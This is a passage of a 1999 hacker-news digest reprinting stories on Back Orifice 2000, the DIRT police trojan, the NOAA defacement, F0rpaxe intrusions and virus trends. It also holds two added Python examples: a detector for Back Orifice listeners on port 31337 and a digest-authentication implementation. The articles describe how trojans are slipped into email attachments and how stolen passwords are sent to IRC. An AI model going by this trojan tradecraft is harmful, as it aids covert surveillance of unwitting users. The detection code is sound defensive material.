      executive said. 

      Brad Smith, general counsel for worldwide
      sales and support for Microsoft, said the
      software company is seeing a growing
      stream of revenue from settlements and
      criminal penalties assessed against
      counterfeiters. 




      "Obviously we rely heavily on law
      enforcement for support," Smith said.
      "Given that support from the public
      sector, we felt it was proper to share
      some of these recoveries with the
      communities that, like the company, are
      suffering from piracy." 

      He said that Microsoft, which had $14.5
      billion in revenues last year, expects at
      least $10 million in civil and criminal
      antipiracy proceeds annually over the
      next five years, although he said the
      company is spending more than that on
      efforts to enforce software laws. 

      Smith said piracy is not necessarily
      growing, but authorities are increasing
      their enforcement in part because many
      large counterfeiting operations are
      connected to organized crime. 

      "The reason we go after it so much is
      because we're cutting off a major source
      of funding for criminal syndicates," said
      Marc Frank, a Westminster, California,
      police sergeant who heads the
      multi-agency Asian Organized Crime Task
      Force. 

      "It's not because we're the Microsoft
      police," he said. "It's because we're
      hitting the organized criminal syndicate
      where it hurts them -- in the
      pocketbook." 

      The task force's efforts culminated this
      year with a raid on a factory in the
      southern California city where officers
      found $2.5 million in manufacturing
      equipment and more than $40 million
      worth of counterfeit Microsoft Windows,
      Office, and other programs. A total of 11
      people have been arrested or indicted in
      connection with the raid, Frank said. 

      Microsoft's donations will go toward
      technology access and education
      projects around the world, Smith said. 

      Copyright (c) 1999 Reuters Limited. 

      @HWA
      
 22.0 Biometrics comes to Home Shopping 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      June 29th
      
      From HNN http://www.hackernews.com/      
      
       
      contributed by RickDogg 
      The Home Shopping Network will introduce biometric
      security to a large variety of consumers when it
      launches its voice-print technology next month. This
      new technology will enable HSN to automatically identify
      customers by their voice. This will allow repeat
      customers to order products faster and will allow HSN to
      create a very accurate customer database. 

      Wired
      http://www.wired.com/news/news/technology/story/20460.html
      
      Giving Voice to Net Security
      by Leander Kahney 
      
      3:00 a.m.  29.Jun.99.PDT
      The Home Shopping Network next month
      will be able to automatically identify
      customers on the phone by their voices. 
      
      In the first large-scale deployment of its
      kind, HSN's speech-print service will allow
      frequent shoppers to dispense with
      passwords and personal identification
      numbers, the company said. 
      
      
      
      
      Voice recognition is just the first step:
      HSN said it hopes to completely automate
      the ordering process by the end of the
      year. 
      
      Based on technology from Nuance
      Communications, the voiceprint system
      will ask callers for their phone numbers.
      Callers will then be passed on to human
      order-takers to complete the purchase. 
      
      "[Voice-recognition systems] are a lot
      more convenient for the customer and
      can save the company a lot of money,"
      said Steve Ehrlich, Nuance's vice
      president of marketing. 
      
      Automated phone-ordering systems can
      cost 90 percent less than conventional,
      human-operated systems, according to
      Ehrlich, who said Charles Schwab will roll
      out a similar system later this year. 
      
      He said the technology handles a number
      of languages and copes well with regional
      accents and things like bad phone lines
      and stuffy noses. 
      
      In addition to convenience, the
      technology will help HSN build a detailed
      database of its customers, said Bill
      Meisel, editor and publisher of the Speech
      Recognition Update, a monthly
      newsletter. 
      
      Currently, a household is issued a single
      verification number by HSN. 
      
      The voiceprint technology will allow the
      company to identify and collect data on
      individual members in a household, Meisel
      said. 
      
      "These are the kind of subtle advantages
      that make fraud prevention almost a
      secondary consideration," he said. 
      
      However, Meisel said the voiceprint
      system will be more secure than using a
      verification number. 
      
      To crack the system would require a
      wiretap to obtain an accurate recording
      of someone's voice, Meisel said. It should
      not be possible to simply use a tape
      recorder. 
      
      "The process of taping a voice changes
      its acoustic characteristics," he said. "It
      wouldn't work with a tape recorder ...
      practically speaking, it's very difficult [to
      crack the system]." 
      
      Meisel said similar voice-recognition
      systems are in use in prisons, where
      calling rights are a form of prison
      commerce. 
      
      @HWA
      

23.0 Palm VII Revealed 
     ~~~~~~~~~~~~~~~~~

     June 29th
     
     From HNN http://www.hackernews.com/      
 
    
     contributed by Kingpin 
     Too poor to buy a Palm VII? Don't want to risk your new
     toy? Well one brave soul has taken apart his Palm VII,
     taken pictures, and posted them to the web. A nice
     treat for you hardware guys. 

     The Gadgeteer
     http://www.the-gadgeteer.com/palmvii-guts.html
     
     @HWA
     
     
24.0 Who Is HNN? 
     ~~~~~~~~~~~

     June 29th
     
     From HNN http://www.hackernews.com/      
     
     contributed by Space Rogue 
     A lot of people have asked just who is it that runs HNN
     and keeps the place together. We have created a page
     to answer just that question. The page even has
     pictures and everything. 

     Who Is HNN?
     http://www.hackernews.com/misc/whorwe.html

     HNN will be packing up shop and heading for Las Vegas
     sometime around Wednesday next week. We will do
     what we can to update the site remotely but the
     updates may be periodic at best. Besides who is going
     to be around to read HNN if everyone is at Defcon?
     
     @HWA
     

25.0 AntiOnline on the trail of f0rpaxe
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From www.antionline.com
     
     AntiOnline Tracks F0rpaxe 
     Tuesday, June 29, 1999 at 14:00:15
     by John Vranesevich - Founder of AntiOnline 

     AntiOnline investigations into the recent wave of attacks being
     done by a group known as 'F0rpaxe' have led to the discovery of
     the true-life-identity of the group's leader, aka m1crochip.

     F0rpaxe is known to have broken into over 130 servers in the
     past two months, belonging to dozens of different organizations,
     including:

          NASA Goddard Space Flight Center 
          US Navy 
          US Coast Guard 
          US Department of Agriculture 
          US Department of the Interior 
          University of Wisconsin 
          Harvard University 
          University of Colorado 
          Georgetown University 
          University of Michigan 
          UC Davis 


     F0rpaxe officially 'Declared War' against the US government
     after the FBI raided several malicious hackers, including
     individuals known to be members of the 'gH' hacking group,
     which is believed to be responsible for attacks against the White
     House's Website. F0rpaxe released a statement earlier this
     month which read in part:

     We think that FBI should explain what a fuck they are doing.
     For the moment we wont destroy the servers we hack but if it
     is necessary we can burn alot of servers.

     M1crochip, along with several other F0rpaxe members, has
     been featured in several publications, including MSNBC and
     Wired News.

     F0rpaxe's latest attack took place yesterday, against servers at
     UCLA.

     AntiOnline was able to gain the name and phone number of
     m1crochip, who lives in the city of Perafita, Portugal, shortly
     after a request for information came in.

     Note: AntiOnline will not release information on this individual to the general public.

     @HWA     

26.0 Critical NOAA Web Site Attacked 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     June 30th
     
     From HNN http://www.hackernews.com/      
     
       


      contributed by Mortel 
      The Storm Prediction Center, an arm of the National
      Oceanic and Atmospheric Agency (NOAA) was defaced
      yesterday. While the site was primarily used to
      distribute severe weather warnings, that information
      was available from other sources such as the National
      Weather Service. Unfortunately NOAA chose to run
      critical services such as email on the same machine so
      when they took down the server to correct the
      defacement their email was also off line creating severe
      disruptions in office work flow. 

      HNN Cracked Pages Archive
      http://www.hackernews.com/archive/crackarch.html
      
      Fox News
      http://www.foxnews.com/js_index.sml?content=/scitech/wires2/0629/t_rt_0629_40.sml
      
      MSNBC
      http://www.msnbc.com/news/284765.asp
      
      Computer World
      http://www.computerworld.com/home/news.nsf/all/9906292noaahac
      
      Andover News
      http://www.andovernews.com/cgi-bin/news_story.pl?3570/topstories
      

      Correction: 1615EST 
      We have been informed that the email server was not
      on the same machine as the web server but was taken
      offline as a precautionary measure until the extent of
      the attack could be determined. 
      
      Fox;
      
      Hackers Hit Storm Prediction Web Site
            8:16 p.m. ET (017 GMT) June 29, 1999

      NORMAN, Okla. -- Computer hackers vandalized the Web page of the top U.S.
      weather agency's storm prediction center Tuesday in the latest of a rash of attacks
      on government Internet sites, officials said. 
     
      The attack blocked the Internet weather warnings of the Storm Prediction Center,
      an arm of the National Oceanic and Atmospheric Agency (NOAA), at a time of
      year when powerful thunderstorms and tornadoes can break out across the Plains
      states. 
     
      "If there were severe weather already happening at that time of morning, it could
      have been a problem for a lot of people," Dr Joseph Schaeffer, director of the
      Storm Prediction Center, told Reuters. 
     
      Hackers calling themselves the "Keebler Elves" deleted the Storm Prediction
      Center homepage (www.spc.noaa.gov) and replaced it with their own page
      declaring "Learn to fear the elite". 
     
      Schaeffer said the same storm forecasts were available elsewhere, including from
      the National Weather Service. 
     
      But he said the blockage was an inconvenience to emergency management
      officials, who are used to quick and easy Internet access to the center's updated
      weather maps and other data. 
     
      The attack was discovered at 3:00 a.m. EDT (0700 GMT) by someone trying to
      find weather data and reported quickly, so storm center technical staffers shut
      down the Web page. 
     
      Repairing the damage and tracing and recording the hacker's steps for potential
      future criminal prosecution would keep the Web site down until late Tuesday,
      officials said. 
     
      The damage also shut down the Web page of NOAA's Severe Storm Laboratory
      (www.ssl.noaa.gov), which is next door to the storm prediction center in Norman,
      Oklahoma. The Internet pages for both centers are run from the same computer,
      which was invaded by the hackers. 
     
      The U.S. Army earlier Tuesday said it had launched a criminal investigation into an
      electronic break-in of its main Internet site, but stressed that hackers did not breach
      military security or operations. 
     
      A hacker group also broke into four U.S. Department of Agriculture Web sites
      over the weekend, the USDA said. 
     
      Military and other government officials have voiced major concern over repeated
      break-ins in the past year by electronic wizards anxious to simply show their
      hacking ability or to actually steal secrets. 
     
      In March, a Pentagon-sponsored study ordered by Congress in 1995 concluded that
      military computer and communications systems were increasingly vulnerable to
      attack by hackers and high-tech enemies. 
      
      -=-
      
      Computer World;
      
      Weather Web site hit by intruders
                     By Kathleen Ohlson


      The National Oceanic and Atmospheric Administration's
      (NOAA) Storm Prediction Center became the latest Web
      target of hackers when one or more intruders broke into the
      site. 

      Both the site and e-mail for the Storm Prediction Center,
      based in Norman, Okla., were taken down as soon as the
      infiltration was detected, said Tim Tomastik, the NOAA's
      deputy director of public affairs in Washington. Tomastik
      said the attack on the federal weather service forced its
      clients and customers to go to other sites for weather data.
      "It's weather data," he said. "There's no national security
      involved. I have no idea why they would go after it." 

      Officials are still trying to determine what, if any, damage
      was done to the site by the intrusion. So far, they know that
      some "real minor goofing with the text occurred," but
      nothing major, Tomastik said. 

      Yesterday, the U.S. Army Web site was breached and the
      home page defaced. 

      Tomastik said the NOAA is evaluating its system and
      expects federal authorities to look into what happened. The
      site is expected to be back up later today. 

      
      
      @HWA
      
      
 27.0 Back Orifice 2000 is on its Way 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
     

      contributed by RickDogg 
      Set to be released on July 10th at Defcon, Back Orifice
      2000 is already making news. The new version of Back
      Orifice will run on NT, be much harder to detect and
      have a very robust plugin architecture. 

      Wired
      http://www.wired.com/news/news/technology/story/20493.html
      
      Back Orifice 2000      
      http://www.bo2k.com
      
      Wired;
      
      Coming Soon: Back Orifice 2000
      by Niall McKay 

      3:00 a.m.  30.Jun.99.PDT
      An underground computer security group is poised to release a new version of a
      notorious software program that could allow crackers to watch and listen in on
      Windows-based PC users. 

      The Cult of the Dead Cow said it will release Back Orifice 2000 on 9 July -- at
      the annual Def Con convention in Las Vegas. 

      "This will demonstrate that Microsoft's operating systems are completely
      insecure and a bad choice for consumers and businesses who demand privacy,"
      said Oxblood Ruffian, a former United Nations consultant and current Cult of
      the Dead Cow spokesman. 


        See also: Back Orifice a Pain in the ...?
        http://redirect.wired.com/redir/10025/http://www.wired.com/news/news/technology/story/14092.html


      Def Con is perhaps the most unusual gathering in the computer security field.
      Hackers, crackers, and self-proclaimed security experts will mingle with media,
      security professionals, federal law enforcement officers, and "script kiddies"
      who deface Web pages with prefab cracking code. 

      Security groups of all stripes use the occasion to release software and show
      off gadgets. But Back Orifice 2000 is perhaps the most anticipated item. 

      Unlike previous versions of the software, Back Orifice 2000 will run on Windows NT
      and feature strong encryption and a modular architecture that the group said
      will allow hackers and other security groups to write plug-ins. 

      The program will be released as open source to encourage further development
      by the security community. 

      Back Orifice, released at last year's Def Con, may allow malicious users to monitor
      and tamper with computers without the permission or knowledge of their owners. 

      The program is classified as a Trojan Horse because crackers need to dupe the
      user into installing an application on their hard disk. Despite this, Oxblood Ruffian
      said that the program is currently installed on up to a half-million PCs
      worldwide. 

      Though that number could not be independently verified, an Australian
      computer security group last November said that 1,400 Australian Internet
      accounts have been compromised by Back Orifice. 

      Back Orifice 2000 also promises to be a great deal more difficult to detect than
      its predecessor because it enables users to configure its port setting. Previously,
      intrusion detection and antivirus programs could detect Back Orifice because it used
      a default port setting of 3113.  (Er that should read 31337 -Ed)

      A Microsoft Windows NT Server security manager said the company is closely
      monitoring Back Orifice development and is working with antivirus and intrusion
      detection software vendors to provide customers with utilities to combat the
      software. 
      
      
      "Trojan Horses are not technological issues but a social engineering problem
      because they rely on the ability of the cracker to trick the user into running an
      application," said Scott Culp.  

      "It's just a fact of computer science that if you run a piece of code on your
      machine you run the risk of making your system vulnerable." 

      The solution, according to Culp, is to ensure that users do not install any
      software from untrusted sources and regularly update antivirus and intrusion
      detection programs. 

      Also at the show, independent security consulting firm L0pht Heavy Industries will
      release Anti-Sniffer, a network monitoring tool, and will announce B00te Call, a
      PalmPilot War Dialer. Such programs will automatically dial telephone numbers in
      sequence, looking for modems. 

      Zero-Knowledge Systems is also expected to provide further details about Freedom,
      a network of servers promising total online anonymity. 

      Def Con will also feature some of its legendary sideshow attractions, such as
      the Spot the Fed contest. In this game, conference attendees are invited to point
      out suspicious attendees who may be working for federal law enforcement
      agencies. Winners will be awarded an "I spotted the Fed" T-shirt. 

      Other diversions include a fancy dress ball, Hacker Jeopardy, and the Hacker
      Death Match, a game that enables hackers to take their flame mails out of
      cyberspace and into reality by dressing up in giant inflatable Sumo suits to do
      battle. 

      Well-heeled attendees are invited to a US$100 outing to Cirque du Soleil. 

      Meanwhile, the conference will include sessions on how to detect wiretaps; the
      art and science of enemy profiling; hacking ethics, morality, and patriotism;
      cyber-forensic analysis; and a talk on the practice of hiring hackers as security
      consultants. 

      @HWA
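
      The detection point in the Wired piece above (a signature on the default
      port 31337 stops working once the port is configurable), as an added
      example that is not part of the original article or of any vendor's
      product. The log format, host names, baseline and port 40123 are
      constructed for illustration.

```python
from collections import namedtuple

# Default port named in the editor's correction to the article above.
BO_DEFAULT_PORT = 31337

Listener = namedtuple("Listener", "time host proto port")

# Constructed baseline: the listeners each workstation is expected to have.
BASELINE = {
    "ws-014": {("tcp", 135), ("tcp", 139), ("udp", 137), ("udp", 138)},
    "ws-022": {("tcp", 135), ("tcp", 139), ("udp", 137), ("udp", 138)},
    "ws-031": {("tcp", 139), ("udp", 137)},
}

# Constructed inventory of listening sockets: "time host proto port".
SAMPLE_LINES = """\
1999-07-12T09:14:02 ws-014 udp 31337
1999-07-12T09:14:02 ws-014 tcp 139
1999-07-12T09:14:05 ws-022 tcp 135
1999-07-12T09:15:40 ws-022 udp 40123
1999-07-12T09:16:11 ws-031 tcp 139
1999-07-12T09:16:30 ws-031 tcp notaport
truncated-line
1999-07-12T09:17:02 ws-099 tcp 80
"""


def parse_listeners(text):
    """Return (records, rejected_lines); malformed lines are kept for review."""
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = line.split()
        if len(parts) != 4 or parts[2] not in ("tcp", "udp") or not parts[3].isdigit():
            rejected.append(line)
            continue
        port = int(parts[3])
        if not 0 < port < 65536:
            rejected.append(line)
            continue
        records.append(Listener(parts[0], parts[1], parts[2], port))
    return records, rejected


def default_port_alerts(records):
    """Signature approach: flag only listeners on the well-known default port."""
    return [r for r in records if r.port == BO_DEFAULT_PORT]


def baseline_alerts(records, baseline):
    """Port-independent approach: flag any listener the host is not expected to have."""
    alerts = []
    for r in records:
        allowed = baseline.get(r.host)
        if allowed is None:
            alerts.append((r, "host has no baseline"))
        elif (r.proto, r.port) not in allowed:
            alerts.append((r, "listener not in baseline"))
    return alerts


if __name__ == "__main__":
    recs, bad = parse_listeners(SAMPLE_LINES)
    print("default-port signature:", default_port_alerts(recs))
    for rec, why in baseline_alerts(recs, BASELINE):
        print("baseline deviation:", rec, "-", why)
    print("unparsed lines:", bad)
```

      The fixed-port check reports only ws-014, while the baseline comparison
      also reports the listener on ws-022 that was moved to another port.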
      
 28.0 Support for Web Security Spec Announced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
      
       
      contributed by RickDogg 
      Microsoft and HP have announced their support for the
      HTTP/1.1 Message Digest Authentication specification.
      This new specification published by the Internet
      Engineering Task Force last month proposes the use of
      MD5 instead of SSL for password traffic. 

      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,408287,00.html
      
      @HWA
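
      How a digest exchange keeps the password off the wire, as an added
      example that is not from HNN, ZD Net or either vendor. It assumes the
      specification meant above is RFC 2617 (HTTP Digest Access
      Authentication) and uses that RFC's own sample values; the class and
      function names are hypothetical.

```python
import hashlib
import hmac
import secrets


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    # H(A1): the only place the password enters the calculation.
    return md5_hex(f"{username}:{realm}:{password}")


def digest_response(ha1_hex, method, uri, nonce, nc, cnonce, qop="auth"):
    # response = MD5( H(A1) : nonce : nc : cnonce : qop : H(A2) ), qop=auth case.
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def client_authorization(username, password, method, uri, challenge, nc, cnonce):
    """Client side: build the Authorization fields from the server's challenge."""
    h = ha1(username, challenge["realm"], password)
    return {
        "username": username, "realm": challenge["realm"],
        "nonce": challenge["nonce"], "uri": uri, "qop": "auth",
        "nc": nc, "cnonce": cnonce,
        "response": digest_response(h, method, uri, challenge["nonce"], nc, cnonce),
    }


class DigestServer:
    """Server side: stores H(A1) per user and rejects reused nonce counts."""

    def __init__(self, realm):
        self.realm = realm
        self.ha1_by_user = {}   # H(A1) is password-equivalent within this realm
        self.highest_nc = {}    # nonce -> highest nonce count accepted so far

    def add_user(self, username, password):
        self.ha1_by_user[username] = ha1(username, self.realm, password)

    def challenge(self, nonce=None):
        nonce = nonce or secrets.token_hex(16)
        self.highest_nc[nonce] = 0
        return {"realm": self.realm, "nonce": nonce, "qop": "auth"}

    def verify(self, method, auth):
        stored = self.ha1_by_user.get(auth.get("username"))
        if stored is None:
            return False, "unknown user"
        nonce = auth.get("nonce")
        if nonce not in self.highest_nc:
            return False, "nonce not issued by this server"
        try:
            count = int(auth.get("nc", ""), 16)
        except ValueError:
            return False, "bad nonce count"
        if count <= self.highest_nc[nonce]:
            return False, "replayed nonce count"
        expected = digest_response(stored, method, auth.get("uri", ""), nonce,
                                   auth.get("nc", ""), auth.get("cnonce", ""))
        if not hmac.compare_digest(expected, auth.get("response", "")):
            return False, "response mismatch"
        self.highest_nc[nonce] = count
        return True, "ok"


def demo():
    # Sample values from RFC 2617 section 3.5.
    server = DigestServer("testrealm@host.com")
    server.add_user("Mufasa", "Circle Of Life")
    ch = server.challenge(nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093")
    auth = client_authorization("Mufasa", "Circle Of Life", "GET",
                                "/dir/index.html", ch, "00000001", "0a4f113b")
    first = server.verify("GET", auth)
    replay = server.verify("GET", auth)   # same fields sent a second time
    return auth["response"], first, replay


if __name__ == "__main__":
    print(demo())
```

      Only the response hash crosses the network, but the request and reply
      bodies remain unencrypted, so the scheme protects the password rather
      than the traffic that SSL would cover.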
 
 
 29.0 Pentagon Investigates Computer Security Breach 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
      
      contributed by RickDogg 
      An employee of the Defense Threat Reduction Agency is
      under investigation by the Air Force Office of Special
      Investigations for allegedly seeking unauthorized access
      to the computer system of a coworker. Evidently the
      employee requested access to a senior official's
      computer while the official was away. The request was
      denied and no access was gained. 

      San Jose Mercury News
      http://www.sjmercury.com/breaking/docs/020735.htm
      
      Posted at 9:22 a.m. PDT Tuesday, June 29, 1999 

      Defense employee faces probe
      over computer incident
  
      WASHINGTON (AP) -- The Pentagon said today it is investigating an
      attempted computer security breach last week at a defense agency
      responsible for reviewing sensitive technology exports.
  
      An unidentified employee of the Defense Threat Reduction Agency is
      under investigation for allegedly seeking unauthorized access to the
      computer system of a coworker, agency spokesman Clem Gaines said.
  
      Gaines said the employee under investigation by the Air Force Office
      of Special Investigations had requested access to the government
      computer used by Peter Leitner, a senior advisor to the defense agency
      on matters involving exports of sensitive technologies. Gaines declined
      to identify the individual.
  
      The individual's request for use of Leitner's computer was denied and
      there was no security breach, Gaines said.
  
      The unauthorized request for access to Leitner's computer was made
      June 24, while Leitner was on Capitol Hill testifying before the House
      Committee on Government Reform, Gaines said.
  
      Leitner has rankled some in the Pentagon by charging that senior
      defense officials have glossed over concerns in the lower ranks that
      U.S. businesses were allowed to sell China and other countries
      technology with military applications.
  
      Gaines, the agency spokesman, said he could not discuss any details of
      the computer security investigation, which was requested Monday by
      the agency's director, Jay Davis.
  
      Pending the outcome of the investigation, the individual has been
      temporarily assigned to other duties, which Gaines did not specify.

      
      
      @HWA
      
 30.0 What will the Next Generation of Viruses Bring? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      


      contributed by Deepquest 
      Melissa and WormExplorer were devastating to business
      and governments world wide. As viruses get more
      sophisticated and virus writers get more creative what
      sort of viruses can the world expect to see in the next
      six months or a year? 

      BBC
      http://news.bbc.co.uk/hi/english/sci/tech/newsid_381000/381054.stm
      
      Sci/Tech

             New virus spills your beans 

             Virus threatens document security 

             A new strain of computer virus could distribute your
             highly confidential documents all over the Internet. 

             Anti-virus developers are warning that they cannot
             develop an antidote until the virus appears. Far from
             destroying vital files, the virus will make sure everyone
             can see them. 

             The new virus is expected to be a variant of either
             Melissa or the Explore.Zip worm, both of which have
             cost businesses millions in recent weeks. 

             Both Melissa and the Explore.Zip worm rely on people
             opening email attachments. Once into the computer the
             virus sends a message to everyone in the victim's in-box
             and then destroys every file written in Microsoft Word,
             Excel or Powerpoint, among others. 

             New virus on the block 

             One variant has already appeared. PrettyPark replicates
             itself by sending copies to everyone in the victim's
             address book. 

             It waits silently until the victim is on the Internet, then
             sends lists of the victim's user names, password files
             and address lists to Internet Relay Chat channels.
             Anti-virus developers are expecting the next step to be a
             virus which roots around in your files and then posts your
             documents across the Internet. 

             "The virus wouldn't be able to tell which of your
             documents are secret. It might just post your shopping
             list, or it could be a highly sensitive company document.

             "What's more, it would appear as if you sent it," says
             Graham Cluley of Sophos Anti-Virus. 

             Several anti-virus makers already have an answer to
             PrettyPark. But they cannot build a defence against
             future variants until they encounter them. 

             Java and ActiveX - next infection target 

             It is predicted that the next generation of viral infections
             will hit small Webpage programmes called applets,
             written in Java and ActiveX. 

             A recent survey revealed that more than half of
             medium-sized organisations using an intranet had no
             security policy in place to respond to the threat of
             attacks on Java applets. 

             Recent estimates indicate that Melissa, Explore.Zip and
             other malicious attacks have cost US business $7.6bn
             this year alone. The viruses cannot infect Macintosh or
             Unix systems. 
             
      @HWA
      
 31.0 DIRT still Around, Used by Law Enforcement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
      
      contributed by wannabe 
      We have all heard of BO (Back Orifice) or NetBus but
      what about DIRT? DIRT stands for Data Interception by
      Remote Transmission and is a commercial software
      package only available to law enforcement officials.
      DIRT, like BO and NetBus, allows remote control of a PC
      with or without the user's knowledge. Unfortunately this
      article makes no mention of whether it is necessary for
      law enforcement to get a search warrant before they
      use such a tool. 

      PC World
      http://www.pcworld.com/pcwtoday/article/0,1510,11614,00.html

      Correction 1615EST 
      Evidently the above story does mention that a search
      warrant is needed before law enforcement can use this
      tool. Unfortunately we missed that information. The
      story does mention that Frank Jones thinks that the Cult
      of the Dead Cow stole the idea for Back Orifice after
      seeing a DIRT demo. We have received staunch denials
      of this accusation from several members of cDc. 

      PC World;
      

      Getting DIRT on the Bad
      Guys

      Here's the ultimate weapon in the war against
      cyber crime. 

      by Tom Spring, PC World 
      June 29, 1999, 12:23 p.m. PT 

      To former detective Frank Jones, "secure network" is
      an oxymoron. The word "delete" isn't in his vocabulary.
      Password-protect your computer and you'll make his
      day. 

      And if you really get on Jones' bad side, he'll take
      complete control of your PC--and your first clue will be
      when you open your door and the boys in overcoats
      start flashing badges at you. 

      If you're among the anonymous thousands of cyber bad
      guys who inhabit the Internet's underbelly, Jones is
      your worst nightmare. 

      The retired New York City detective works on the law
      enforcement sidelines building software tools to help
      the government and police crack down on online
      criminals. 

      And his latest tool is considered the ultimate weapon. 


      Digging up DIRT

      Jones wrote the widely used, but little-known software
      program called DIRT. The program works like a
      telephone wiretap for computers, giving its users the
      ability to monitor and intercept data from any Windows
      PC in the world. 

      DIRT stands for Data Interception by Remote
      Transmission and was originally created by Jones as a
      tool to help snare online child pornographers. But in the
      short time it has been available only to government and
      law enforcement agencies, DIRT is now used to battle
      hacker groups like Cult of the Dead Cow and to trap
      terrorists, drug dealers, money launderers, and spies. 

      "What we do is give law enforcement an additional line
      of defense," says Jones, the president of Codex Data
      Systems. 


      The DIRTy Details 

      The client side version of the DIRT program is less than
      20KB in size and is typically installed on a target PC
      using a Trojan horse program (a set of instructions
      hidden inside a legitimate program). The DIRT program
      is usually sneaked inside an e-mail attachment, a
      macro, or a workable program that a targeted user is
      enticed to download. 

      Once inside a target Windows 95/98/NT computer, it
      gives law enforcement complete control of the system
      without the user's knowledge. 

      It starts off by secretly recording every keystroke the
      user makes. The next time the user goes online, DIRT
      transmits the log for analysis. Jones says government
      agencies have even managed to open encrypted files
      by obtaining password locks. 

      During a recent program demonstration, Jones easily
      uploaded and downloaded files to a DIRT-infected
      computer connected to the Net by a dial-up modem.
      Jones could upload and download files to the PC
      without a hint of activity on the other end. 

      Arresting Developments 

      If you think this sounds like B-grade fiction, it isn't.
      During a recent meeting of high-ranking federal and
      state gumshoes, DIRT received glowing software
      reviews. Many cited long lists of arrests thanks to
      Codex. 

      One police detective said DIRT has become a powerful
      tool in fighting crime online. It aids criminal
      investigations and results in about one arrest each
      month. Most of those arrested were suspected
      pedophiles, he said. 

      The hardest part of using DIRT, say its users, is getting
      owners of targeted computers to download the Trojan
      horse programs. Typically law enforcement tries to
      entice a targeted individual to download a program or a
      compressed file that must be "un-zipped" which
      contains the DIRT bug inside. Because the program is
      not available to the public, DIRT is undetectable using
      virus scanning software, Jones said. 

      "The only way to avoid DIRT is to ignore your e-mail,"
      he says. 


      Fighting Fire With Fire 

      Jones says law enforcement desperately needs these
      tools to turn the tide in its battle against online crime.
      "Law enforcement is outgunned," he says. 

      In an age where hacking horror stories have become
      front-page news, DIRT gives law enforcement an
      effective tool to even the score and catch the bad guy. 

      On one recent occasion DIRT was used to track a
      suspected drug dealer as he zigzagged across the
      country from client to client selling methamphetamines.
      His big mistake, police say, was keeping a client list
      on his laptop and logging into the Net each night to
      stay in touch with business associates and friends. 

      Using DIRT, police tracked his whereabouts each night
      and took notes on who his associates were. The
      alleged drug dealer was eventually arrested as he was
      surfing the Net in a San Jose, California motel room. 


      A Form of Flattery?

      Though DIRT is restricted to military, government, and
      law enforcement agencies, the "Back Orifice" hacker
      tool offers some similar tricks. 

      Jones maintains that its inventor, a member of the
      hacking group Cult of the Dead Cow, attended Codex's
      first public demonstration of DIRT more than a year ago
      and slapped together an "imitation" of DIRT based on
      what he saw. 

      "Close, but no cigar," Jones says. 

      But according to Mike Hudack, editor of
      Aviary-mag.com, an online magazine for hackers,
      there's more to Back Orifice than that. An updated
      version called "Back Orifice 2000" is expected to hit
      the Web in July. 
      
      Big Brotherware? 

      Hudack says the technological Cold War between
      white-hat hackers and black-hat hackers is just
      beginning--and law enforcement needs all the help it
      can get. 

      But others view DIRT as a potential threat to privacy,
      raising serious legal and ethical questions as a means
      of gathering information. 

      To use DIRT law enforcement agencies must first
      obtain a wiretap search warrant. But privacy groups
      maintain that this type of electronic surveillance goes
      far beyond wiretap warrants because DIRT allows
      authorities to invisibly snoop inside a targeted PC's
      entire hard drive --not just monitor electronic
      communications. 

      "Throughout history law enforcement has had a long
      track record of overstepping its bounds when it comes
      to search warrants," says Shari Steele, director of legal
      services for Electronic Freedom Foundation, the privacy
      rights group. 

      Unless appropriate checks and balances are in place,
      Steele says, DIRT can quickly go from being an
      effective crime-fighting tool to a privacy activist's worst
      nightmare. 

      The American Civil Liberties Union takes a harder
      stance. 

      "Clandestine searches like these are the worst kind,"
      says Barry Steinhardt, associate director of the ACLU.
      "This is exactly the kind of search the Fourth
      Amendment is designed to protect us from." 

                              
      @HWA 
      
 32.0 Debit Cards Not Safe on the Internet 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 30th
     
      From HNN http://www.hackernews.com/      
      
      contributed by mortel 
      Illustrating the problem of debit card use on the
      Internet, Don Garlock, a consultant for the Bedford
      County Sheriff's Department in Bedford, VA, describes his
      search for the people who wiped out his bank account. 

      MSNBC
      http://www.msnbc.com/news/283239.asp
      
      
      The dark side of
      online shopping
      Trail of fraud leads from
      Amazon.com to Thailand
      By Molly Masland
                      MSNBC

              
       June 24 - When Internet investigator Don
       Garlock's bank account was mysteriously cleaned
       out in early June, the last thing he expected was
       that the search for the culprit would take him on a
       shadowy trail through cyberspace. The clues
       began at online retail giant Amazon.com and led to
       a ring of alleged hackers in Bangkok, Thailand.
       Along the way, Garlock picked up crucial lessons
       about the perils of online shopping, even at sites
       that claim to be "100 percent safe."
      
        A CONSULTANT for the Bedford County Sheriff's
        Department in Bedford, Va., Garlock works for Operation
        Blue Ridge Thunder, a program aimed at stopping crimes
        against children on the Internet. Garlock has logged hundreds
        of hours hunting down pedophiles and child pornographers
        online. 
               So when his personal bank account was suddenly
        emptied in early June, Garlock put his online tracking skills to
        the test. But even he was surprised by what he discovered.
               
        FRAUDULENT CHARGES AT AMAZON
               According to Mainstreet Bank Group, Garlock's bank,
        someone had purchased nearly $1,400 worth of merchandise
        at Amazon.com and charged it to his debit card account.
               When the mysterious charges at Amazon.com appeared,
        Garlock immediately suspected fraud and called the online
